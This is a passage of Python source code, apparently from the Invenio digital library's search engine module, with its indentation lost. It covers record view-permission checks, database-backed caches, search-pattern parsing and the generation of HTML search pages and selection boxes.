@param recid: the record identifier.
@type recid: positive integer
@return: True if the user is 'allow to view' the record; False otherwise
@rtype: bool
"""
authorized_emails_or_group = []
for tag in CFG_ACC_GRANT_VIEWER_RIGHTS_TO_EMAILS_IN_TAGS:
authorized_emails_or_group.extend(get_fieldvalues(recid, tag))
for email_or_group in authorized_emails_or_group:
if email_or_group in user_info['group']:
return True
email = email_or_group.strip().lower()
if user_info['email'].strip().lower() == email:
return True
return False
def check_user_can_view_record(user_info, recid):
"""
Check if the user is authorized to view the given recid. The function
grants access in two cases: either user has author rights on this
record, or he has view rights to the primary collection this record
belongs to.
@param user_info: the user_info dictionary that describe the user.
@type user_info: user_info dictionary
@param recid: the record identifier.
@type recid: positive integer
@return: (0, ''), when authorization is granted, (>0, 'message') when
authorization is not granted
@rtype: (int, string)
"""
policy = CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY.strip().upper()
if isinstance(recid, str):
recid = int(recid)
## At this point, either webcoll has not yet run or there are some
## restricted collections. Let's see first if the user own the record.
if is_user_owner_of_record(user_info, recid):
## Perfect! It's authorized then!
return (0, '')
if is_user_viewer_of_record(user_info, recid):
## Perfect! It's authorized then!
return (0, '')
restricted_collections = get_restricted_collections_for_recid(recid, recreate_cache_if_needed=False)
if not restricted_collections and record_public_p(recid):
## The record is public and not part of any restricted collection
return (0, '')
if restricted_collections:
## If there are restricted collections the user must be authorized to all/any of them (depending on the policy)
auth_code, auth_msg = 0, ''
for collection in restricted_collections:
(auth_code, auth_msg) = acc_authorize_action(user_info, VIEWRESTRCOLL, collection=collection)
if auth_code and policy != 'ANY':
## Ouch! the user is not authorized to this collection
return (auth_code, auth_msg)
elif auth_code == 0 and policy == 'ANY':
## Good! At least one collection is authorized
return (0, '')
## Depending on the policy, the user will be either authorized or not
return auth_code, auth_msg
if is_record_in_any_collection(recid, recreate_cache_if_needed=False):
## the record is not in any restricted collection
return (0, '')
elif record_exists(recid) > 0:
## We are in the case where webcoll has not run.
## Let's authorize SUPERADMIN
(auth_code, auth_msg) = acc_authorize_action(user_info, VIEWRESTRCOLL, collection=None)
if auth_code == 0:
return (0, '')
else:
## Too bad. Let's print a nice message:
return (1, """The record you are trying to access has just been
submitted to the system and needs to be assigned to the
proper collections. It is currently restricted for security reasons
until the assignment will be fully completed. Please come back later to
properly access this record.""")
else:
## The record either does not exists or has been deleted.
## Let's handle these situations outside of this code.
return (0, '')
class IndexStemmingDataCacher(DataCacher):
"""
Provides cache for stemming information for word/phrase indexes.
This class is not to be used directly; use function
get_index_stemming_language() instead.
"""
def __init__(self):
def cache_filler():
try:
res = run_sql("""SELECT id, stemming_language FROM idxINDEX""")
except DatabaseError:
# database problems, return empty cache
return {}
return dict(res)
def timestamp_verifier():
return get_table_update_time('idxINDEX')
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
index_stemming_cache.is_ok_p
except Exception:
index_stemming_cache = IndexStemmingDataCacher()
def get_index_stemming_language(index_id, recreate_cache_if_needed=True):
"""Return stemming langugage for given index."""
if recreate_cache_if_needed:
index_stemming_cache.recreate_cache_if_needed()
return index_stemming_cache.cache[index_id]
class FieldTokenizerDataCacher(DataCacher):
"""
Provides cache for tokenizer information for fields corresponding to indexes.
This class is not to be used directly; use function
get_field_tokenizer_type() instead.
"""
def __init__(self):
def cache_filler():
try:
res = run_sql("""SELECT fld.code, ind.tokenizer FROM idxINDEX AS ind, field AS fld, idxINDEX_field AS indfld WHERE ind.id = indfld.id_idxINDEX AND indfld.id_field = fld.id""")
except DatabaseError:
# database problems, return empty cache
return {}
return dict(res)
def timestamp_verifier():
return get_table_update_time('idxINDEX')
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
field_tokenizer_cache.is_ok_p
except Exception:
field_tokenizer_cache = FieldTokenizerDataCacher()
def get_field_tokenizer_type(field_name, recreate_cache_if_needed=True):
"""Return tokenizer type for given field corresponding to an index if applicable."""
if recreate_cache_if_needed:
field_tokenizer_cache.recreate_cache_if_needed()
tokenizer = None
try:
tokenizer = field_tokenizer_cache.cache[field_name]
except KeyError:
return None
return tokenizer
class CollectionRecListDataCacher(DataCacher):
"""
Provides cache for collection reclist hitsets. This class is not
to be used directly; use function get_collection_reclist() instead.
"""
def __init__(self):
def cache_filler():
ret = {}
try:
res = run_sql("SELECT name FROM collection")
except Exception:
# database problems, return empty cache
return {}
for name in res:
ret[name[0]] = None # this will be filled later during runtime by calling get_collection_reclist(coll)
return ret
def timestamp_verifier():
return get_table_update_time('collection')
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
if not collection_reclist_cache.is_ok_p:
raise Exception
except Exception:
collection_reclist_cache = CollectionRecListDataCacher()
def get_collection_reclist(coll, recreate_cache_if_needed=True):
"""Return hitset of recIDs that belong to the collection 'coll'."""
if recreate_cache_if_needed:
collection_reclist_cache.recreate_cache_if_needed()
if coll not in collection_reclist_cache.cache:
return intbitset() # collection does not exist; return empty set
if not collection_reclist_cache.cache[coll]:
# collection's reclist not in the cache yet, so calculate it
# and fill the cache:
reclist = intbitset()
query = "SELECT nbrecs,reclist FROM collection WHERE name=%s"
res = run_sql(query, (coll, ), 1)
if res:
try:
reclist = intbitset(res[0][1])
except:
pass
collection_reclist_cache.cache[coll] = reclist
# finally, return reclist:
return collection_reclist_cache.cache[coll]
def get_available_output_formats(visible_only=False):
"""
Return the list of available output formats. When visible_only is
True, returns only those output formats that have visibility flag
set to 1.
"""
formats = []
query = "SELECT code,name FROM format"
if visible_only:
query += " WHERE visibility='1'"
query += " ORDER BY name ASC"
res = run_sql(query)
if res:
# propose found formats:
for code, name in res:
formats.append({ 'value' : code,
'text' : name
})
else:
formats.append({'value' : 'hb',
'text' : "HTML brief"
})
return formats
# Flask cache for search results.
from invenio.websearch_cache import search_results_cache, get_search_results_cache_key
class CollectionI18nNameDataCacher(DataCacher):
"""
Provides cache for I18N collection names. This class is not to be
used directly; use function get_coll_i18nname() instead.
"""
def __init__(self):
def cache_filler():
ret = {}
try:
res = run_sql("SELECT c.name,cn.ln,cn.value FROM collectionname AS cn, collection AS c WHERE cn.id_collection=c.id AND cn.type='ln'") # ln=long name
except Exception:
# database problems
return {}
for c, ln, i18nname in res:
if i18nname:
if not ret.has_key(c):
ret[c] = {}
ret[c][ln] = i18nname
return ret
def timestamp_verifier():
return get_table_update_time('collectionname')
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
if not collection_i18nname_cache.is_ok_p:
raise Exception
except Exception:
collection_i18nname_cache = CollectionI18nNameDataCacher()
def get_coll_i18nname(c, ln=CFG_SITE_LANG, verify_cache_timestamp=True):
"""
Return nicely formatted collection name (of the name type `ln'
(=long name)) for collection C in language LN.
This function uses collection_i18nname_cache, but it verifies
whether the cache is up-to-date first by default. This
verification step is performed by checking the DB table update
time. So, if you call this function 1000 times, it can get very
slow because it will do 1000 table update time verifications, even
though collection names change not that often.
Hence the parameter VERIFY_CACHE_TIMESTAMP which, when set to
False, will assume the cache is already up-to-date. This is
useful namely in the generation of collection lists for the search
results page.
"""
if verify_cache_timestamp:
collection_i18nname_cache.recreate_cache_if_needed()
out = c
try:
out = collection_i18nname_cache.cache[c][ln]
except KeyError:
pass # translation in LN does not exist
return out
class FieldI18nNameDataCacher(DataCacher):
"""
Provides cache for I18N field names. This class is not to be used
directly; use function get_field_i18nname() instead.
"""
def __init__(self):
def cache_filler():
ret = {}
try:
res = run_sql("SELECT f.name,fn.ln,fn.value FROM fieldname AS fn, field AS f WHERE fn.id_field=f.id AND fn.type='ln'") # ln=long name
except Exception:
# database problems, return empty cache
return {}
for f, ln, i18nname in res:
if i18nname:
if not ret.has_key(f):
ret[f] = {}
ret[f][ln] = i18nname
return ret
def timestamp_verifier():
return get_table_update_time('fieldname')
DataCacher.__init__(self, cache_filler, timestamp_verifier)
try:
if not field_i18nname_cache.is_ok_p:
raise Exception
except Exception:
field_i18nname_cache = FieldI18nNameDataCacher()
def get_field_i18nname(f, ln=CFG_SITE_LANG, verify_cache_timestamp=True):
"""
Return nicely formatted field name (of type 'ln', 'long name') for
field F in language LN.
If VERIFY_CACHE_TIMESTAMP is set to True, then verify DB timestamp
and field I18N name cache timestamp and refresh cache from the DB
if needed. Otherwise don't bother checking DB timestamp and
return the cached value. (This is useful when get_field_i18nname
is called inside a loop.)
"""
if verify_cache_timestamp:
field_i18nname_cache.recreate_cache_if_needed()
out = f
try:
out = field_i18nname_cache.cache[f][ln]
except KeyError:
pass # translation in LN does not exist
return out
def get_alphabetically_ordered_collection_list(level=0, ln=CFG_SITE_LANG):
"""Returns nicely ordered (score respected) list of collections, more exactly list of tuples
(collection name, printable collection name).
Suitable for create_search_box()."""
out = []
res = run_sql("SELECT name FROM collection ORDER BY name ASC")
for c_name in res:
c_name = c_name[0]
# make a nice printable name (e.g. truncate c_printable for
# long collection names in given language):
c_printable_fullname = get_coll_i18nname(c_name, ln, False)
c_printable = wash_index_term(c_printable_fullname, 30, False)
if c_printable != c_printable_fullname:
c_printable = c_printable + "..."
if level:
c_printable = " " + level * '-' + " " + c_printable
out.append([c_name, c_printable])
return out
def get_nicely_ordered_collection_list(collid=1, level=0, ln=CFG_SITE_LANG):
"""Returns nicely ordered (score respected) list of collections, more exactly list of tuples
(collection name, printable collection name).
Suitable for create_search_box()."""
colls_nicely_ordered = []
res = run_sql("""SELECT c.name,cc.id_son FROM collection_collection AS cc, collection AS c
WHERE c.id=cc.id_son AND cc.id_dad=%s ORDER BY score DESC""", (collid, ))
for c, cid in res:
# make a nice printable name (e.g. truncate c_printable for
# long collection names in given language):
c_printable_fullname = get_coll_i18nname(c, ln, False)
c_printable = wash_index_term(c_printable_fullname, 30, False)
if c_printable != c_printable_fullname:
c_printable = c_printable + "..."
if level:
c_printable = " " + level * '-' + " " + c_printable
colls_nicely_ordered.append([c, c_printable])
colls_nicely_ordered = colls_nicely_ordered + get_nicely_ordered_collection_list(cid, level+1, ln=ln)
return colls_nicely_ordered
def get_index_id_from_field(field):
"""
Return index id with name corresponding to FIELD, or the first
index id where the logical field code named FIELD is indexed.
Return zero in case there is no index defined for this field.
Example: field='author', output=4.
"""
out = 0
if not field:
field = 'global' # empty string field means 'global' index (field 'anyfield')
# first look in the index table:
res = run_sql("""SELECT id FROM idxINDEX WHERE name=%s""", (field,))
if res:
out = res[0][0]
return out
# not found in the index table, now look in the field table:
res = run_sql("""SELECT w.id FROM idxINDEX AS w, idxINDEX_field AS wf, field AS f
WHERE f.code=%s AND wf.id_field=f.id AND w.id=wf.id_idxINDEX
LIMIT 1""", (field,))
if res:
out = res[0][0]
return out
def get_words_from_pattern(pattern):
"""
Returns list of whitespace-separated words from pattern, removing any
trailing punctuation-like signs from words in pattern.
"""
words = {}
# clean trailing punctuation signs inside pattern
pattern = re_punctuation_followed_by_space.sub(' ', pattern)
for word in string.split(pattern):
if not words.has_key(word):
words[word] = 1
return words.keys()
def create_basic_search_units(req, p, f, m=None, of='hb'):
"""Splits search pattern and search field into a list of independently searchable units.
- A search unit consists of '(operator, pattern, field, type, hitset)' tuples where
'operator' is set union (|), set intersection (+) or set exclusion (-);
'pattern' is either a word (e.g. muon*) or a phrase (e.g. 'nuclear physics');
'field' is either a code like 'title' or MARC tag like '100__a';
'type' is the search type ('w' for word file search, 'a' for access file search).
- Optionally, the function accepts the match type argument 'm'.
If it is set (e.g. from advanced search interface), then it
performs this kind of matching. If it is not set, then a guess is made.
'm' can have values: 'a'='all of the words', 'o'='any of the words',
'p'='phrase/substring', 'r'='regular expression',
'e'='exact value'.
- Warnings are printed on req (when not None) in case of HTML output formats."""
opfts = [] # will hold (o,p,f,t,h) units
# FIXME: quick hack for the journal index
if f == 'journal':
opfts.append(['+', p, f, 'w'])
return opfts
## check arguments: is desired matching type set?
if m:
## A - matching type is known; good!
if m == 'e':
# A1 - exact value:
opfts.append(['+', p, f, 'a']) # '+' since we have only one unit
elif m == 'p':
# A2 - phrase/substring:
opfts.append(['+', "%" + p + "%", f, 'a']) # '+' since we have only one unit
elif m == 'r':
# A3 - regular expression:
opfts.append(['+', p, f, 'r']) # '+' since we have only one unit
elif m == 'a' or m == 'w':
# A4 - all of the words:
p = strip_accents(p) # strip accents for 'w' mode, FIXME: delete when not needed
for word in get_words_from_pattern(p):
opfts.append(['+', word, f, 'w']) # '+' in all units
elif m == 'o':
# A5 - any of the words:
p = strip_accents(p) # strip accents for 'w' mode, FIXME: delete when not needed
for word in get_words_from_pattern(p):
if len(opfts)==0:
opfts.append(['+', word, f, 'w']) # '+' in the first unit
else:
opfts.append(['|', word, f, 'w']) # '|' in further units
else:
if of.startswith("h"):
write_warning("Matching type '%s' is not implemented yet." % cgi.escape(m), "Warning", req=req)
opfts.append(['+', "%" + p + "%", f, 'w'])
else:
## B - matching type is not known: let us try to determine it by some heuristics
if f and p[0] == '"' and p[-1] == '"':
## B0 - does 'p' start and end by double quote, and is 'f' defined? => doing ACC search
opfts.append(['+', p[1:-1], f, 'a'])
elif f in ('author', 'firstauthor', 'exactauthor', 'exactfirstauthor', 'authorityauthor') and author_name_requires_phrase_search(p):
## B1 - do we search in author, and does 'p' contain space/comma/dot/etc?
## => doing washed ACC search
opfts.append(['+', p, f, 'a'])
elif f and p[0] == "'" and p[-1] == "'":
## B0bis - does 'p' start and end by single quote, and is 'f' defined? => doing ACC search
opfts.append(['+', '%' + p[1:-1] + '%', f, 'a'])
elif f and p[0] == "/" and p[-1] == "/":
## B0ter - does 'p' start and end by a slash, and is 'f' defined? => doing regexp search
opfts.append(['+', p[1:-1], f, 'r'])
elif f and string.find(p, ',') >= 0:
## B1 - does 'p' contain comma, and is 'f' defined? => doing ACC search
opfts.append(['+', p, f, 'a'])
elif f and str(f[0:2]).isdigit():
## B2 - does 'f' exist and starts by two digits? => doing ACC search
opfts.append(['+', p, f, 'a'])
else:
## B3 - doing WRD search, but maybe ACC too
# search units are separated by spaces unless the space is within single or double quotes
# so, let us replace temporarily any space within quotes by '__SPACE__'
p = re_pattern_single_quotes.sub(lambda x: "'"+string.replace(x.group(1), ' ', '__SPACE__')+"'", p)
p = re_pattern_double_quotes.sub(lambda x: "\""+string.replace(x.group(1), ' ', '__SPACE__')+"\"", p)
p = re_pattern_regexp_quotes.sub(lambda x: "/"+string.replace(x.group(1), ' ', '__SPACE__')+"/", p)
# and spaces after colon as well:
p = re_pattern_spaces_after_colon.sub(lambda x: string.replace(x.group(1), ' ', '__SPACE__'), p)
# wash argument:
p = re_logical_and.sub(" ", p)
p = re_logical_or.sub(" |", p)
p = re_logical_not.sub(" -", p)
p = re_operators.sub(r' \1', p)
for pi in string.split(p): # iterate through separated units (or items, as "pi" stands for "p item")
pi = re_pattern_space.sub(" ", pi) # replace back '__SPACE__' by ' '
# firstly, determine set operator
if pi[0] == '+' or pi[0] == '-' or pi[0] == '|':
oi = pi[0]
pi = pi[1:]
else:
# okay, there is no operator, so let us decide what to do by default
oi = '+' # by default we are doing set intersection...
# secondly, determine search pattern and field:
if string.find(pi, ":") > 0:
fi, pi = string.split(pi, ":", 1)
fi = wash_field(fi)
# test whether fi is a real index code or a MARC-tag defined code:
if fi in get_fieldcodes() or '00' <= fi[:2] <= '99':
pass
else:
# it is not, so join it back:
fi, pi = f, fi + ":" + pi
else:
fi, pi = f, pi
# wash 'fi' argument:
fi = wash_field(fi)
# wash 'pi' argument:
pi = pi.strip() # strip eventual spaces
if re_quotes.match(pi):
# B3a - quotes are found => do ACC search (phrase search)
if pi[0] == '"' and pi[-1] == '"':
pi = string.replace(pi, '"', '') # remove quote signs
opfts.append([oi, pi, fi, 'a'])
elif pi[0] == "'" and pi[-1] == "'":
pi = string.replace(pi, "'", "") # remove quote signs
opfts.append([oi, "%" + pi + "%", fi, 'a'])
else: # unbalanced quotes, so fall back to WRD query:
opfts.append([oi, pi, fi, 'w'])
elif pi.startswith('/') and pi.endswith('/'):
# B3b - pi has slashes around => do regexp search
opfts.append([oi, pi[1:-1], fi, 'r'])
elif fi and len(fi) > 1 and str(fi[0]).isdigit() and str(fi[1]).isdigit():
# B3c - fi exists and starts by two digits => do ACC search
opfts.append([oi, pi, fi, 'a'])
elif fi and not get_index_id_from_field(fi) and get_field_name(fi):
# B3d - logical field fi exists but there is no WRD index for fi => try ACC search
opfts.append([oi, pi, fi, 'a'])
else:
# B3e - general case => do WRD search
pi = strip_accents(pi) # strip accents for 'w' mode, FIXME: delete when not needed
for pii in get_words_from_pattern(pi):
opfts.append([oi, pii, fi, 'w'])
## sanity check:
for i in range(0, len(opfts)):
try:
pi = opfts[i][1]
if pi == '*':
if of.startswith("h"):
write_warning("Ignoring standalone wildcard word.", "Warning", req=req)
del opfts[i]
if pi == '' or pi == ' ':
fi = opfts[i][2]
if fi:
if of.startswith("h"):
write_warning("Ignoring empty <em>%s</em> search term." % fi, "Warning", req=req)
del opfts[i]
except:
pass
## replace old logical field names if applicable:
if CFG_WEBSEARCH_FIELDS_CONVERT:
opfts = [[o, p, wash_field(f), t] for o, p, f, t in opfts]
## return search units:
return opfts
def page_start(req, of, cc, aas, ln, uid, title_message=None,
description='', keywords='', recID=-1, tab='', p='', em=''):
"""
Start page according to given output format.
@param title_message: title of the page, not escaped for HTML
@param description: description of the page, not escaped for HTML
@param keywords: keywords of the page, not escaped for HTML
"""
_ = gettext_set_language(ln)
if not req or isinstance(req, cStringIO.OutputType):
return # we were called from CLI
if not title_message:
title_message = _("Search Results")
content_type = get_output_format_content_type(of)
if of.startswith('x'):
if of == 'xr':
# we are doing RSS output
req.content_type = "application/rss+xml"
req.send_http_header()
req.write("""<?xml version="1.0" encoding="UTF-8"?>\n""")
else:
# we are doing XML output:
req.content_type = get_output_format_content_type(of, 'text/xml')
req.send_http_header()
req.write("""<?xml version="1.0" encoding="UTF-8"?>\n""")
elif of.startswith('t') or str(of[0:3]).isdigit():
# we are doing plain text output:
req.content_type = "text/plain"
req.send_http_header()
elif of == "intbitset":
req.content_type = "application/octet-stream"
req.send_http_header()
elif of == "id":
pass # nothing to do, we shall only return list of recIDs
elif content_type == 'text/html':
# we are doing HTML output:
req.content_type = "text/html"
req.send_http_header()
if not description:
description = "%s %s." % (cc, _("Search Results"))
if not keywords:
keywords = "%s, WebSearch, %s" % (get_coll_i18nname(CFG_SITE_NAME, ln, False), get_coll_i18nname(cc, ln, False))
## generate RSS URL:
argd = {}
if req.args:
argd = cgi.parse_qs(req.args)
rssurl = websearch_templates.build_rss_url(argd)
## add MathJax if displaying single records (FIXME: find
## eventual better place to this code)
if of.lower() in CFG_WEBSEARCH_USE_MATHJAX_FOR_FORMATS:
metaheaderadd = get_mathjax_header(req.is_https())
else:
metaheaderadd = ''
# Add metadata in meta tags for Google scholar-esque harvesting...
# only if we have a detailed meta format and we are looking at a
# single record
if (recID != -1 and CFG_WEBSEARCH_DETAILED_META_FORMAT):
metaheaderadd += format_record(recID, \
CFG_WEBSEARCH_DETAILED_META_FORMAT, \
ln = ln)
## generate navtrail:
navtrail = create_navtrail_links(cc, aas, ln)
if navtrail != '':
navtrail += ' > '
if (tab != '' or ((of != '' or of.lower() != 'hd') and of != 'hb')) and \
recID != -1:
# If we are not in information tab in HD format, customize
# the nav. trail to have a link back to main record. (Due
# to the way perform_request_search() works, hb
# (lowercase) is equal to hd)
navtrail += ' <a class="navtrail" href="%s/%s/%s">%s</a>' % \
(CFG_SITE_URL, CFG_SITE_RECORD, recID, cgi.escape(title_message))
if (of != '' or of.lower() != 'hd') and of != 'hb':
# Export
format_name = of
query = "SELECT name FROM format WHERE code=%s"
res = run_sql(query, (of,))
if res:
format_name = res[0][0]
navtrail += ' > ' + format_name
else:
# Discussion, citations, etc. tabs
tab_label = get_detailed_page_tabs(cc, ln=ln)[tab]['label']
navtrail += ' > ' + _(tab_label)
else:
navtrail += cgi.escape(title_message)
if p:
# we are serving search/browse results pages, so insert pattern:
navtrail += ": " + cgi.escape(p)
title_message = p + " - " + title_message
body_css_classes = []
if cc:
# we know the collection, lets allow page styles based on cc
#collection names may not satisfy rules for css classes which
#are something like: -?[_a-zA-Z]+[_a-zA-Z0-9-]*
#however it isn't clear what we should do about cases with
#numbers, so we leave them to fail. Everything else becomes "_"
css = nmtoken_from_string(cc).replace('.','_').replace('-','_').replace(':','_')
body_css_classes.append(css)
## finally, print page header:
if em == '' or EM_REPOSITORY["header"] in em:
req.write(pageheaderonly(req=req, title=title_message,
navtrail=navtrail,
description=description,
keywords=keywords,
metaheaderadd=metaheaderadd,
uid=uid,
language=ln,
navmenuid='search',
navtrail_append_title_p=0,
rssurl=rssurl,
body_css_classes=body_css_classes))
req.write(websearch_templates.tmpl_search_pagestart(ln=ln))
else:
req.content_type = content_type
req.send_http_header()
def page_end(req, of="hb", ln=CFG_SITE_LANG, em=""):
"End page according to given output format: e.g. close XML tags, add HTML footer, etc."
if of == "id":
return [] # empty recID list
if of == "intbitset":
return intbitset()
if not req:
return # we were called from CLI
if of.startswith('h'):
req.write(websearch_templates.tmpl_search_pageend(ln = ln)) # pagebody end
if em == "" or EM_REPOSITORY["footer"] in em:
req.write(pagefooteronly(lastupdated=__lastupdated__, language=ln, req=req))
return
def create_page_title_search_pattern_info(p, p1, p2, p3):
"""Create the search pattern bit for the page <title> web page
HTML header. Basically combine p and (p1,p2,p3) together so that
the page header may be filled whether we are in the Simple Search
or Advanced Search interface contexts."""
out = ""
if p:
out = p
else:
out = p1
if p2:
out += ' ' + p2
if p3:
out += ' ' + p3
return out
def create_inputdate_box(name="d1", selected_year=0, selected_month=0, selected_day=0, ln=CFG_SITE_LANG):
"Produces 'From Date', 'Until Date' kind of selection box. Suitable for search options."
_ = gettext_set_language(ln)
box = ""
# day
box += """<select name="%sd">""" % name
box += """<option value="">%s""" % _("any day")
for day in range(1, 32):
box += """<option value="%02d"%s>%02d""" % (day, is_selected(day, selected_day), day)
box += """</select>"""
# month
box += """<select name="%sm">""" % name
box += """<option value="">%s""" % _("any month")
# trailing space in May distinguishes short/long form of the month name
for mm, month in [(1, _("January")), (2, _("February")), (3, _("March")), (4, _("April")), \
(5, _("May ")), (6, _("June")), (7, _("July")), (8, _("August")), \
(9, _("September")), (10, _("October")), (11, _("November")), (12, _("December"))]:
box += """<option value="%02d"%s>%s""" % (mm, is_selected(mm, selected_month), month.strip())
box += """</select>"""
# year
box += """<select name="%sy">""" % name
box += """<option value="">%s""" % _("any year")
this_year = int(time.strftime("%Y", time.localtime()))
for year in range(this_year-20, this_year+1):
box += """<option value="%d"%s>%d""" % (year, is_selected(year, selected_year), year)
box += """</select>"""
return box
def create_search_box(cc, colls, p, f, rg, sf, so, sp, rm, of, ot, aas,
ln, p1, f1, m1, op1, p2, f2, m2, op2, p3, f3,
m3, sc, pl, d1y, d1m, d1d, d2y, d2m, d2d, dt, jrec, ec,
action="", em=""):
"""Create search box for 'search again in the results page' functionality."""
if em != "" and EM_REPOSITORY["search_box"] not in em:
if EM_REPOSITORY["body"] in em and cc != CFG_SITE_NAME:
return '''
<h1 class="headline">%(ccname)s</h1>''' % {'ccname' : cgi.escape(cc), }
else:
return ""
# load the right message language
_ = gettext_set_language(ln)
# some computations
cc_intl = get_coll_i18nname(cc, ln, False)
cc_colID = get_colID(cc)
colls_nicely_ordered = []
if cfg_nicely_ordered_collection_list:
colls_nicely_ordered = get_nicely_ordered_collection_list(ln=ln)
else:
colls_nicely_ordered = get_alphabetically_ordered_collection_list(ln=ln)
colls_nice = []
for (cx, cx_printable) in colls_nicely_ordered:
if not cx.startswith("Unnamed collection"):
colls_nice.append({ 'value' : cx,
'text' : cx_printable
})
coll_selects = []
if colls and colls[0] != CFG_SITE_NAME:
# some collections are defined, so print these first, and only then print 'add another collection' heading:
for c in colls:
if c:
temp = []
temp.append({ 'value' : CFG_SITE_NAME,
'text' : '*** %s ***' % _("any public collection")
})
# this field is used to remove the current collection from the ones to be searched.
temp.append({ 'value' : '',
'text' : '*** %s ***' % _("remove this collection")
})
for val in colls_nice:
# print collection:
if not cx.startswith("Unnamed collection"):
temp.append({ 'value' : val['value'],
'text' : val['text'],
'selected' : (c == re.sub("^[\s\-]*","", val['value']))
})
coll_selects.append(temp)
coll_selects.append([{ 'value' : '',
'text' : '*** %s ***' % _("add another collection")
}] + colls_nice)
else: # we searched in CFG_SITE_NAME, so print 'any public collection' heading
coll_selects.append([{ 'value' : CFG_SITE_NAME,
'text' : '*** %s ***' % _("any public collection")
}] + colls_nice)
## ranking methods
ranks = [{
'value' : '',
'text' : "- %s %s -" % (_("OR").lower (), _("rank by")),
}]
for (code, name) in get_bibrank_methods(cc_colID, ln):
# propose found rank methods:
ranks.append({
'value' : code,
'text' : name,
})
formats = get_available_output_formats(visible_only=True)
# show collections in the search box? (not if there is only one
# collection defined, and not if we are in light search)
show_colls = True
show_title = True
if len(collection_reclist_cache.cache.keys()) == 1 or \
aas == -1:
show_colls = False
show_title = False
if cc == CFG_SITE_NAME:
show_title = False
if CFG_INSPIRE_SITE:
show_title = False
return websearch_templates.tmpl_search_box(
ln = ln,
aas = aas,
cc_intl = cc_intl,
cc = cc,
ot = ot,
sp = sp,
action = action,
fieldslist = get_searchwithin_fields(ln=ln, colID=cc_colID),
f1 = f1,
f2 = f2,
f3 = f3,
m1 = m1,
m2 = m2,
m3 = m3,
p1 = p1,
p2 = p2,
p3 = p3,
op1 = op1,
op2 = op2,
rm = rm,
p = p,
f = f,
coll_selects = coll_selects,
d1y = d1y, d2y = d2y, d1m = d1m, d2m = d2m, d1d = d1d, d2d = d2d,
dt = dt,
sort_fields = get_sortby_fields(ln=ln, colID=cc_colID),
sf = sf,
so = so,
ranks = ranks,
sc = sc,
rg = rg,
formats = formats,
of = of,
pl = pl,
jrec = jrec,
ec = ec,
show_colls = show_colls,
show_title = show_title and (em=="" or EM_REPOSITORY["body"] in em)
)
def create_exact_author_browse_help_link(p=None, p1=None, p2=None, p3=None, f=None, f1=None, f2=None, f3=None,
rm=None, cc=None, ln=None, jrec=None, rg=None, aas=0, action=""):
"""Creates a link to help switch from author to exact author while browsing"""
if action == 'browse':
search_fields = (f, f1, f2, f3)
if ('author' in search_fields) or ('firstauthor' in search_fields):
def add_exact(field):
if field == 'author' or field == 'firstauthor':
return 'exact' + field
return field
(fe, f1e, f2e, f3e) = map(add_exact, search_fields)
link_name = f or f1
link_name = (link_name == 'firstauthor' and 'exact first author') or 'exact author'
return websearch_templates.tmpl_exact_author_browse_help_link(p=p, p1=p1, p2=p2, p3=p3, f=fe, f1=f1e, f2=f2e, f3=f3e,
rm=rm, cc=cc, ln=ln, jrec=jrec, rg=rg, aas=aas, action=action,
link_name=link_name)
return ""
def create_navtrail_links(cc=CFG_SITE_NAME, aas=0, ln=CFG_SITE_LANG, self_p=1, tab=''):
"""Creates navigation trail links, i.e. links to collection
ancestors (except Home collection). If aas==1, then links to
Advanced Search interfaces; otherwise Simple Search.
"""
dads = []
for dad in get_coll_ancestors(cc):
if dad != CFG_SITE_NAME: # exclude Home collection
dads.append ((dad, get_coll_i18nname(dad, ln, False)))
if self_p and cc != CFG_SITE_NAME:
dads.append((cc, get_coll_i18nname(cc, ln, False)))
return websearch_templates.tmpl_navtrail_links(
aas=aas, ln=ln, dads=dads)
def get_searchwithin_fields(ln='en', colID=None):
"""Retrieves the fields name used in the 'search within' selection box for the collection ID colID."""
res = None
if colID:
res = run_sql("""SELECT f.code,f.name FROM field AS f, collection_field_fieldvalue AS cff
WHERE cff.type='sew' AND cff.id_collection=%s AND cff.id_field=f.id
ORDER BY cff.score DESC, f.name ASC""", (colID,))
if not res:
res = run_sql("SELECT code,name FROM field ORDER BY name ASC")
fields = [{
'value' : '',
'text' : get_field_i18nname("any field", ln, False)
}]
for field_code, field_name in res:
if field_code and field_code != "anyfield":
fields.append({ 'value' : field_code,
'text' : get_field_i18nname(field_name, ln, False)
})
return fields
def get_sortby_fields(ln='en', colID=None):
"""Retrieves the fields name used in the 'sort by' selection box for the collection ID colID."""
_ = gettext_set_language(ln)
res = None
if colID:
res = run_sql("""SELECT DISTINCT(f.code),f.name FROM field AS f, collection_field_fieldvalue AS cff
WHERE cff.type='soo' AND cff.id_collection=%s AND cff.id_field=f.id
ORDER BY cff.score DESC, f.name ASC""", (colID,))
if not res:
# no sort fields defined for this colID, try to take Home collection:
res = run_sql("""SELECT DISTINCT(f.code),f.name FROM field AS f, collection_field_fieldvalue AS cff
WHERE cff.type='soo' AND cff.id_collection=%s AND cff.id_field=f.id
ORDER BY cff.score DESC, f.name ASC""", (1,))
if not res:
# no sort fields defined for the Home collection, take all sort fields defined wherever they are:
res = run_sql("""SELECT DISTINCT(f.code),f.name FROM field AS f, collection_field_fieldvalue AS cff
WHERE cff.type='soo' AND cff.id_field=f.id
ORDER BY cff.score DESC, f.name ASC""",)
fields = [{
'value' : '',
'text' : _("latest first")
}]
for field_code, field_name in res:
if field_code and field_code != "anyfield":
fields.append({ 'value' : field_code,
'text' : get_field_i18nname(field_name, ln, False)
})
return fields
def create_andornot_box(name='op', value='', ln='en'):
"Returns HTML code for the AND/OR/NOT selection box."
_ = gettext_set_language(ln)
out = """
<select name="%s">
<option value="a"%s>%s
<option value="o"%s>%s
<option value="n"%s>%s
</select>
""" % (name,
is_selected('a', value), _("AND"),
is_selected('o', value), _("OR"),
is_selected('n', value), _("AND NOT"))
return out
def create_matchtype_box(name='m', value='', ln='en'):
"Returns HTML code for the 'match type' selection box."
_ = gettext_set_language(ln)
out = """
<select name="%s">
<option value="a"%s>%s
<option value="o"%s>%s
<option value="e"%s>%s
<option value="p"%s>%s
<option value="r"%s>%s
</select>
""" % (name,
is_selected('a', value), _("All of the words:"),
is_selected('o', value), _("Any of the words:"),
is_selected('e', value), _("Exact phrase:"),
is_selected('p', value), _("Partial phrase:"),
is_selected('r', value), _("Regular expression:"))
return out
def is_selected(var, fld):
